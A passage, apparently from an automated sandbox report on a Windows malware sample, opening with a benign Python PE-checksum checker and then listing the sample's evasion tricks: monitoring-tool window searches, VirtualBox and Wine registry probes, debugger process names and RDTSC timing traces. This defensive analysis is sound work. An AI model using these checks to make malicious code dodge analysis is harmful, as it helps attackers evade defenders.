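The "real checksum: 0x453b98 should be: 0x44a30c" line above is a weak signal on its own: Windows only enforces the PE CheckSum for drivers and boot-time images, and packers or post-link patching routinely leave it stale, which fits the renamed sections and the .taggant entry point seen here. To reproduce the "should be" figure on a sample yourself, the Python below (an added example, not from the report or the sample) implements the algorithm imagehlp's CheckSumMappedFile uses: a one's-complement sum of every 16-bit word in the file, skipping the 4-byte CheckSum field itself, folded to 16 bits and added to the file length. The MZ/PE image it builds for the demonstration is constructed, not the analysed binary; give it a file path to check a real sample.

```python
import struct
import sys


def checksum_field_offset(data: bytes) -> int:
    """Offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 4 (PE\\0\\0) + 20 (file header) + 64.
    The 64-byte offset inside the optional header is the same for PE32 and PE32+."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return e_lfanew + 0x58


def pe_checksum(data: bytes) -> int:
    """One's-complement sum of all little-endian 16-bit words, skipping the CheckSum field,
    folded to 16 bits, plus the file length. Assumes e_lfanew is even (true for linker output)."""
    skip = checksum_field_offset(data)
    padded = data + b"\0" * (len(data) % 2)       # odd-length files get one zero pad byte
    total = 0
    for off in range(0, len(padded), 2):
        if off in (skip, skip + 2):
            continue
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)   # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    return total + len(data)


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def verify_checksum(data: bytes) -> tuple:
    """(stored, computed); a mismatch is what the report's 'real checksum ... should be' line flags."""
    return stored_checksum(data), pe_checksum(data)


def fix_checksum(data: bytes) -> bytes:
    """Return a copy with the CheckSum field set to the recomputed value."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(data), pe_checksum(data))
    return bytes(buf)


def build_test_image(size: int = 0x400, checksum: int = 0) -> bytes:
    """Constructed MZ/PE header skeleton (not the analysed sample) so the example runs offline."""
    buf = bytearray(size)
    e_lfanew = 0x80
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", buf, e_lfanew + 4, 0x14C)         # Machine: IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", buf, e_lfanew + 24, 0x10B)        # Magic: PE32
    struct.pack_into("<I", buf, e_lfanew + 0x58, checksum)   # CheckSum
    for i in range(0x200, size):                             # filler standing in for section data
        buf[i] = (i * 37 + 11) & 0xFF
    return bytes(buf)


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_image()
    stored, computed = verify_checksum(image)
    print(f"stored 0x{stored:x}, computed 0x{computed:x}: {'match' if stored == computed else 'MISMATCH'}")
```

Because the CheckSum field is excluded from its own sum, the stored value can be anything without changing the computed one; that is why the report can state a single "should be" value, and why a mismatch tells you the header was modified after linking but nothing about by whom.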

Boot Survival

Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 12E09F9 second address: 12E0A0B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FF108C7BF06h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 12E0A0B second address: 12E0A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461ACD second address: 1461AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF108C7BF17h 0x00000008 jp 00007FF108C7BF06h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461AF6 second address: 1461B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF108873976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B00 second address: 1461B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B04 second address: 1461B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B0A second address: 1461B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B10 second address: 1461B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B14 second address: 1461B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B18 second address: 1461B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FF108873976h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461CEE second address: 1461D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF0Ah 0x00000009 jl 00007FF108C7BF06h 0x0000000f popad 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461D0B second address: 1461D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461D0F second address: 1461D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461FE9 second address: 1461FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461FED second address: 1462008 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF108C7BF06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108C7BF0Ah 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1462008 second address: 1462014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1462014 second address: 1462018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14621B3 second address: 14621B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14621B9 second address: 14621BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14621BF second address: 14621C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14621C8 second address: 14621CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 146243F second address: 1462443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1462443 second address: 1462447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1462447 second address: 1462450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14645FA second address: 146462D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007FF108C7BF06h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f adc dx, 2942h 0x00000014 push 00000000h 0x00000016 add dword ptr [ebp+122D253Fh], eax 0x0000001c push 361DCACEh 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 jmp 00007FF108C7BF0Eh 0x00000029 pop ebx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 146462D second address: 1464633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 146474E second address: 146475D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 146475D second address: 1464765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1464765 second address: 14647FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FF108C7BF08h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov edx, ebx 0x00000023 or dword ptr [ebp+122D1AA7h], ebx 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D19EBh], ecx 0x00000031 call 00007FF108C7BF09h 0x00000036 pushad 0x00000037 jmp 00007FF108C7BF15h 0x0000003c jmp 00007FF108C7BF11h 0x00000041 popad 0x00000042 push eax 0x00000043 pushad 0x00000044 jmp 00007FF108C7BF13h 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FF108C7BF18h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14647FD second address: 1464846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FF108873986h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007FF10887397Bh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1464846 second address: 146485E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jne 00007FF108C7BF06h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 146485E second address: 14648A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a adc cx, 0D0Fh 0x0000000f push 00000003h 0x00000011 add ecx, 5CEAFE56h 0x00000017 push 00000000h 0x00000019 xor cx, 19F0h 0x0000001e push 00000003h 0x00000020 mov edi, 48F11A41h 0x00000025 push B3C6BAB3h 0x0000002a pushad 0x0000002b pushad 0x0000002c jl 00007FF108873976h 0x00000032 ja 00007FF108873976h 0x00000038 popad 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1464980 second address: 14649A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FF108C7BF12h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jo 00007FF108C7BF18h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14649A5 second address: 14649A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1464A82 second address: 1464A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14770E6 second address: 14770EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14770EC second address: 14770F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1483818 second address: 1483821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1483AC8 second address: 1483AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1483D38 second address: 1483D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1483D3D second address: 1483D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FF108C7BF06h 0x0000000a jbe 00007FF108C7BF06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 148402E second address: 1484032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484032 second address: 1484047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF108C7BF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FF108C7BF06h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484047 second address: 148404B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14841C7 second address: 14841E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF19h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14841E5 second address: 14841EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14841EB second address: 14841F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14843A2 second address: 14843A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484564 second address: 1484568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484568 second address: 148456C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14847CB second address: 14847E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FF108C7BF0Fh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484A90 second address: 1484AB3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF108873989h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484AB3 second address: 1484AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484AB7 second address: 1484AE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873985h 0x00000007 jmp 00007FF108873982h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484AE2 second address: 1484AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF108C7BF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1485289 second address: 148528D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1485521 second address: 1485571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jo 00007FF108C7BF2Fh 0x00000010 jmp 00007FF108C7BF18h 0x00000015 jmp 00007FF108C7BF11h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF108C7BF15h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1486F73 second address: 1486F95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FF108873989h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 145AF05 second address: 145AF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF108C7BF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14897A4 second address: 14897B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF10887397Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14897B8 second address: 14897EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF108C7BF15h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jl 00007FF108C7BF10h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14897EA second address: 14897FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FF10887397Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14897FC second address: 1489800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 148EBC4 second address: 148EC07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF108873987h 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007FF108873987h 0x00000012 pushad 0x00000013 jmp 00007FF10887397Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 148EC07 second address: 148EC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF108C7BF14h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1491786 second address: 14917AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF10887397Eh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jp 00007FF108873976h 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149192F second address: 1491934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1491934 second address: 149193A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149193A second address: 1491955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007FF108C7BF1Ah 0x0000000b jmp 00007FF108C7BF0Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1491ABF second address: 1491AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF10887397Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1491F09 second address: 1491F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
